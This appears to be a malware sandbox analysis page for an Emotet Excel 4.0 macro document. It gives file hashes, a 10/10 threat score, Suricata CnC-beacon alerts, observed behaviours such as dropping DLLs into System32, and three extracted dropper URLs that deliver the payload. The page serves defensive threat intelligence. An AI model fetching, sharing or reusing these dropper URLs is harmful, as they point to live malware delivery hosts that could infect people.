Overview

overview

10

Static

static

8

emotet_v6

windows10_x64

10

emotet_doc

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

  • Size

    83KB

  • Sample

    220114-jtajtsfcbk

  • MD5

    98f9e5ee47c74bad8a3d8abdbd55e0f2

  • SHA1

    3961997d2fdec003121adccce3afe8a45d7d2b42

  • SHA256

    42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

  • SHA512

    4f0eef38fc9d601fdc5732cd0b066fa11d554282bb6f49e4e1c78a7509f800af8fc9417445ef86394594efe72f9559a762a28b6d2140dfe64805690cd8719263

Score
10/10
macrosuricataxlm

Malware Config

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://moversphiladelphia.org/cmsxml/9ByFSxP/
xlm40.dropper

http://staging.mobettertech.com/assets/priWXQiXuU3JH/
xlm40.dropper

https://goldfinancenews.com/wp-includes/thCuZE5VAdTQ/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://moversphiladelphia.org/cmsxml/9ByFSxP/

Targets

    • Target

      42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

    • Size

      83KB

    • MD5

      98f9e5ee47c74bad8a3d8abdbd55e0f2

    • SHA1

      3961997d2fdec003121adccce3afe8a45d7d2b42

    • SHA256

      42c5bb56d6d7939abf3f29c32648b0239c79d8362d5b7634e96c8387b4376831

    • SHA512

      4f0eef38fc9d601fdc5732cd0b066fa11d554282bb6f49e4e1c78a7509f800af8fc9417445ef86394594efe72f9559a762a28b6d2140dfe64805690cd8719263

    Score
    10/10
    suricata

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • suricata: ET MALWARE W32/Emotet CnC Beacon 3

      suricata: ET MALWARE W32/Emotet CnC Beacon 3

      suricata

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Loads dropped DLL

    • Drops file in System32 directory

    behavioral1behavioral2

MITRE ATT&CK Enterprise v6

Tasks